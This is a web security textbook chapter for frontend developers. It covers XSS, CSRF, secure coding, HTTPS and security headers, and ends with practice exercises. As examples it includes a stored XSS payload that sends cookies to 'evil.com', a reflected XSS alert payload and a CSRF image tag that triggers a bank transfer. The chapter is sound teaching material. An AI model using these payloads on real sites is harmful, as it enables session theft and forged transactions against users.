# Chapter 28: Web Security Fundamentals

---

## Introduction

Security is often perceived as a backend concern—something handled by servers, databases, and network infrastructure. However, as a frontend developer, you play a critical role in protecting your users and their data. Many common attacks, such as Cross‑Site Scripting (XSS) and Cross‑Site Request Forgery (CSRF), exploit vulnerabilities in the frontend code. A single oversight—like failing to sanitize user input or using an insecure cookie—can compromise an entire application.

In this chapter, you will learn the foundational security concepts every frontend developer must know:

- **Core security principles** – defense in depth, least privilege, and never trusting user input.
- **Cross‑Site Scripting (XSS)** – what it is, the different types, and how to prevent it.
- **Cross‑Site Request Forgery (CSRF)** – how it works and how to protect against it.
- **Secure coding practices** – input validation, output encoding, and handling sensitive data.
- **HTTPS and secure connections** – why encryption matters and how to avoid mixed content.
- **Security headers** – using Content Security Policy (CSP), HSTS, and others to harden your site.

By the end of this chapter, you will understand the most common web security threats and how to write frontend code that is resilient against them.

---

## 28.1 Security Principles

Before diving into specific attacks, it's essential to understand the core principles that guide secure development.

### Defense in Depth

**Defense in depth** means layering multiple security controls so that if one fails, others still provide protection. For example:

- Validate input on the client side for user experience, but **always validate on the server** as well.
- Use HTTPS to encrypt data in transit, and also use secure cookies and Content Security Policy.
- Sanitize output to prevent XSS, and also use a strong CSP as a second line of defense.

Never rely on a single security measure.

### Least Privilege

The **principle of least privilege** states that any user, program, or process should have only the minimum privileges necessary to perform its function. For frontend development:

- Don't store sensitive data in `localStorage` unless absolutely necessary.
- Use cookies with the `HttpOnly` flag to prevent JavaScript access to session tokens.
- Limit the scope of API keys and tokens exposed to the client.

### Never Trust User Input

This is the golden rule of web security. Any data that comes from the user—whether from form fields, URL parameters, or even HTTP headers—must be treated as potentially malicious. Always:

- **Validate** – ensure the data conforms to expected formats (e.g., email, number, length).
- **Sanitize** – remove or escape dangerous characters.
- **Encode** – when outputting data, encode it for the appropriate context (HTML, JavaScript, CSS, URL).

---

## 28.2 Cross‑Site Scripting (XSS)

Cross‑Site Scripting (XSS) is one of the most common and dangerous web vulnerabilities. It occurs when an attacker injects malicious scripts into a web page viewed by other users. The injected script can steal cookies, session tokens, or other sensitive information, or perform actions on behalf of the user.

### Types of XSS Attacks

**1. Stored XSS (Persistent XSS)**

The malicious script is permanently stored on the target server (e.g., in a database, comment field, or forum post). When a user requests the stored content, the script is delivered and executed in their browser.

*Example:* An attacker posts a comment containing `<script>fetch('https://evil.com/steal?cookie='+document.cookie)</script>`. When other users view the comment, their cookies are sent to the attacker.

**2. Reflected XSS (Non‑Persistent XSS)**

The malicious script is part of the current request (e.g., in a search query or URL parameter) and is immediately reflected off the web server in the response. The attacker typically tricks the victim into clicking a specially crafted link.

*Example:* A search page that echoes the search term without encoding: `https://example.com/search?q=<script>alert('XSS')</script>`. If the site reflects `q` directly into the page, the script executes.

**3. DOM‑Based XSS**

The vulnerability exists in client‑side JavaScript code that dynamically inserts user‑controlled data into the DOM. The attack never reaches the server; it's entirely in the browser.

*Example:* JavaScript reads a value from `window.location.hash` and writes it to the page using `innerHTML` without sanitization.

### Preventing XSS

**1. Output Encoding (Escaping)**

The most fundamental defense: always encode data before inserting it into HTML, JavaScript, CSS, or URLs. Use the appropriate encoding for the context.

| Context | Encoding Method | Example |
|---------|-----------------|---------|
| HTML body | HTML entity encode | `<` → `&lt;` |
| HTML attribute | Attribute encode | `"` → `&quot;` |
| JavaScript string | JavaScript string encode | `'` → `\'` |
| URL parameter | URL encode | `&` → `%26` |

In practice, use trusted libraries or framework features:

```javascript
// Bad: directly inserting user input
element.innerHTML = userInput;

// Good: using textContent (automatically encodes)
element.textContent = userInput;

// For complex cases, use a sanitization library
import DOMPurify from 'dompurify';
element.innerHTML = DOMPurify.sanitize(userInput);
```

**2. Content Security Policy (CSP)**

CSP is a browser security mechanism that allows you to define which sources of content are trusted. A strong CSP can mitigate XSS even if an injection occurs.

```http
Content-Security-Policy: default-src 'self'; script-src 'self' https://apis.example.com; object-src 'none'
```

This policy:
- Allows scripts only from the same origin and `apis.example.com`.
- Disallows plugins (`object-src`).
- Prevents inline scripts and `eval()` by default (unless you add `'unsafe-inline'`, which you should avoid).

**3. Use Framework Protections**

Modern frameworks like React, Vue, and Angular automatically escape content by default. However, be cautious when using features like `dangerouslySetInnerHTML` (React) or `v-html` (Vue)—they bypass protections.

```jsx
// React: safe by default
<div>{userInput}</div>

// Unsafe: only use with sanitized content
<div dangerouslySetInnerHTML={{ __html: sanitizedContent }} />
```

**4. Sanitize User Input on the Server**

Never trust client‑side validation alone. Sanitize or reject malicious input on the server before storing or processing it.

---

## 28.3 Cross‑Site Request Forgery (CSRF)

Cross‑Site Request Forgery (CSRF) tricks an authenticated user into performing unintended actions on a web application where they are currently logged in. The attacker crafts a malicious request (e.g., via an image tag or a hidden form) and lures the victim to a page that triggers it. Because the request includes the user's session cookie, the server believes it is legitimate.

### How CSRF Works

1. Alice logs into `bank.com` and receives a session cookie.
2. Without logging out, she visits `evil.com`, which contains:
   ```html
   <img src="https://bank.com/transfer?amount=1000&to=attacker">
   ```
3. The browser automatically sends Alice's cookie with the request to `bank.com`.
4. `bank.com` processes the transfer, believing Alice initiated it.

### Preventing CSRF

**1. CSRF Tokens (Synchronizer Token Pattern)**

The server embeds a unique, unpredictable token in forms or AJAX requests. When the request is submitted, the server validates the token. Since the attacker cannot guess the token, the request fails.

```html
<form action="/transfer" method="POST">
    <input type="hidden" name="csrf_token" value="random-unpredictable-value">
    <!-- other form fields -->
</form>
```

For AJAX requests, send the token in a custom header.

**2. SameSite Cookies**

Set the `SameSite` attribute on cookies to control when they are sent:

- `SameSite=Strict` – cookie is sent only for requests originating from the same site.
- `SameSite=Lax` – cookie is sent for top‑level navigations (e.g., clicking a link) but not for embedded requests like images (good balance).
- `SameSite=None` – cookie is sent for all requests (must also use `Secure`).

```http
Set-Cookie: session=abc123; SameSite=Lax; Secure; HttpOnly
```

Modern browsers default to `SameSite=Lax` if not specified, which already protects against many CSRF attacks.

**3. Check Origin Headers**

On the server, validate the `Origin` and `Referer` headers to ensure the request came from your own domain. This is less reliable than tokens but adds another layer.

**4. Use Custom Request Headers**

For AJAX requests, require a custom header (e.g., `X-Requested-With: XMLHttpRequest`). Browsers enforce the same‑origin policy for custom headers, so an attacker cannot add them from a different site.

---

## 28.4 Secure Coding Practices

Beyond specific attacks, adopting secure coding habits will prevent many vulnerabilities.

### Input Validation

Validate all user input on both client and server:

- **Type checking** – ensure numbers are numbers, emails match a pattern, etc.
- **Length limits** – prevent buffer overflows and denial of service.
- **Whitelist allowed characters** rather than blacklisting dangerous ones.

```javascript
// Example: validating an email on the client
function isValidEmail(email) {
    const re = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
    return re.test(email);
}
```

### Output Encoding

As discussed, encode data before inserting it into HTML, JavaScript, or URLs. Use context‑specific encoding functions.

### Principle of Least Privilege for APIs

- Don't expose more data than necessary. For example, if an API returns a user object, don't send the password hash to the client.
- Use scoped API keys with limited permissions.

### Handling Sensitive Data

- **Never store passwords, API keys, or tokens in `localStorage` or `sessionStorage`** – they are accessible to any JavaScript on the same origin.
- Use **`HttpOnly` cookies** for session tokens – they are not accessible via JavaScript, mitigating XSS token theft.
- For sensitive operations, require re‑authentication (e.g., entering password again before changing email or making a large transfer).
- Avoid logging sensitive information to the console.

### Third‑Party Dependencies

- Regularly update libraries to patch known vulnerabilities.
- Use tools like `npm audit` or `yarn audit` to check for vulnerable dependencies.
- Be cautious with third‑party scripts – they have the same access as your own code.

---

## 28.5 HTTPS and Secure Connections

HTTPS (HTTP over TLS) encrypts communication between the browser and the server, protecting against eavesdropping, tampering, and man‑in‑the‑middle attacks.

### Why HTTPS Matters

- **Confidentiality** – data cannot be read in transit.
- **Integrity** – data cannot be modified without detection.
- **Authentication** – the user is assured they are communicating with the genuine website.

Many browser features (like geolocation, service workers, and the Clipboard API) require a secure context (HTTPS or localhost).

### Mixed Content

When a page is loaded over HTTPS but includes resources (images, scripts, styles) over HTTP, that is **mixed content**. Browsers may block or warn about it, and it weakens security.

```html
<!-- Bad: loading script over HTTP on an HTTPS page -->
<script src="http://example.com/script.js"></script>
```

Always use relative URLs or HTTPS URLs for all resources.

### Obtaining and Enforcing HTTPS

- Use a free certificate from **Let's Encrypt**.
- Redirect all HTTP traffic to HTTPS.
- Use **HTTP Strict Transport Security (HSTS)** to tell browsers to always use HTTPS for your domain.

### Secure Cookies

When setting cookies, use these flags:

- **`Secure`** – cookie is only sent over HTTPS.
- **`HttpOnly`** – cookie cannot be accessed by JavaScript (prevents XSS theft).
- **`SameSite`** – as discussed, helps prevent CSRF.

```http
Set-Cookie: session=abc123; Secure; HttpOnly; SameSite=Lax
```

---

## 28.6 Security Headers

HTTP response headers provide an additional layer of security by instructing the browser how to behave.

### Content‑Security‑Policy (CSP)

As introduced in the XSS section, CSP is a powerful header that controls which resources the browser is allowed to load. A well‑configured CSP can prevent XSS, clickjacking, and other attacks.

```http
Content-Security-Policy: 
    default-src 'self';
    script-src 'self' https://trusted-cdn.com;
    style-src 'self' 'unsafe-inline'; /* avoid unsafe-inline if possible */
    img-src 'self' data: https://images.example.com;
    font-src 'self';
    connect-src 'self' https://api.example.com;
    frame-ancestors 'none';
    form-action 'self';
    base-uri 'self';
    object-src 'none';
```

**Key directives:**
- `default-src` – fallback for other resource types.
- `script-src` – allowed sources for JavaScript.
- `style-src` – allowed sources for CSS.
- `img-src` – allowed sources for images.
- `connect-src` – allowed URLs for `fetch`, `XHR`, WebSockets.
- `frame-ancestors` – prevents clickjacking by controlling where your site can be embedded.
- `form-action` – restricts where forms can be submitted.
- `base-uri` – restricts the `<base>` element.

CSP can be deployed in **report‑only mode** to test without blocking:

```http
Content-Security-Policy-Report-Only: ...; report-uri /csp-report-endpoint
```

### HTTP Strict Transport Security (HSTS)

HSTS tells browsers to always use HTTPS for your domain, even if the user types `http://` or clicks an HTTP link. It also prevents users from bypassing certificate warnings.

```http
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
```

- `max-age` – seconds to remember (1 year is common).
- `includeSubDomains` – applies to all subdomains.
- `preload` – allows inclusion in browser preload lists for even stronger enforcement.

### X‑Frame‑Options

Prevents clickjacking by controlling whether your site can be embedded in an iframe.

```http
X-Frame-Options: DENY
X-Frame-Options: SAMEORIGIN
```

`DENY` – no framing allowed.  
`SAMEORIGIN` – framing allowed only from the same origin.

Note that CSP's `frame-ancestors` directive supersedes `X-Frame-Options` in modern browsers.

### X‑Content‑Type‑Options

Prevents MIME type sniffing, which can lead to security vulnerabilities. It forces the browser to respect the declared `Content-Type`.

```http
X-Content-Type-Options: nosniff
```

### Referrer‑Policy

Controls how much referrer information is included with requests. This protects user privacy and can prevent leakage of sensitive URLs.

```http
Referrer-Policy: strict-origin-when-cross-origin
```

Common values:
- `no-referrer` – never send referrer.
- `same-origin` – send referrer only for same‑origin requests.
- `strict-origin-when-cross-origin` – send full URL for same‑origin, origin only for cross‑origin (good default).

### Permissions‑Policy (formerly Feature‑Policy)

Controls which browser features (camera, microphone, geolocation, etc.) your site and embedded third‑party content can use.

```http
Permissions-Policy: geolocation=(), camera=(), microphone=()
```

---

## Chapter Summary

In this chapter, you learned the fundamental security concepts that every frontend developer must understand:

- **Core principles** – defense in depth, least privilege, and never trusting user input.
- **Cross‑Site Scripting (XSS)** – stored, reflected, and DOM‑based attacks, and how to prevent them with output encoding, CSP, and framework protections.
- **Cross‑Site Request Forgery (CSRF)** – how attackers trick authenticated users, and defenses including CSRF tokens, SameSite cookies, and origin validation.
- **Secure coding practices** – input validation, output encoding, handling sensitive data, and managing third‑party dependencies.
- **HTTPS and secure connections** – why encryption matters, avoiding mixed content, and secure cookie flags.
- **Security headers** – CSP, HSTS, X‑Frame‑Options, and others that harden your site against attacks.

### Key Takeaways

- Never trust user input—validate, sanitize, and encode at every boundary.
- Use Content Security Policy (CSP) as a powerful defense against XSS.
- Always use HTTPS and set secure cookie flags (`Secure`, `HttpOnly`, `SameSite`).
- Implement CSRF tokens for state‑changing operations.
- Security is a shared responsibility between frontend and backend—defense in depth is essential.
- Keep your dependencies updated and audit them regularly.

### Practice Exercises

1. **XSS Challenge**: Create a simple page that echoes a URL parameter into the DOM using `innerHTML`. Then exploit it with a script. Fix it by using `textContent` instead.

2. **CSP Implementation**: Add a Content‑Security‑Policy header to a test page. Experiment with different directives and observe what breaks. Use report‑only mode first.

3. **CSRF Simulation**: Build two simple pages: a "bank" transfer form (with CSRF token) and a malicious page that attempts to submit the form without the token. Verify that the token blocks the attack.

4. **Secure Cookie Lab**: In a local HTTPS environment (use mkcert or similar), set a cookie with `Secure`, `HttpOnly`, and `SameSite` flags. Verify that JavaScript cannot access it and that it's only sent over HTTPS.

5. **Security Headers Audit**: Use a tool like securityheaders.com to analyze a website you've built. Implement missing headers and re‑audit.

6. **Dependency Audit**: Run `npm audit` on a project you're working on. Investigate any reported vulnerabilities and update or patch them.

7. **HTTPS Migration**: If you have a site running on HTTP locally, set up a local HTTPS server using `https‑server` or a tool like `ngrok`. Test that mixed content warnings appear when you load HTTP resources.

---

## Coming Up Next

**Chapter 29: Best Practices and Code Quality**

In the next chapter, you'll learn about professional best practices: writing clean code, organizing projects, using version control with Git, documenting your work, and conducting code reviews. These habits will make you a more effective and sought‑after developer.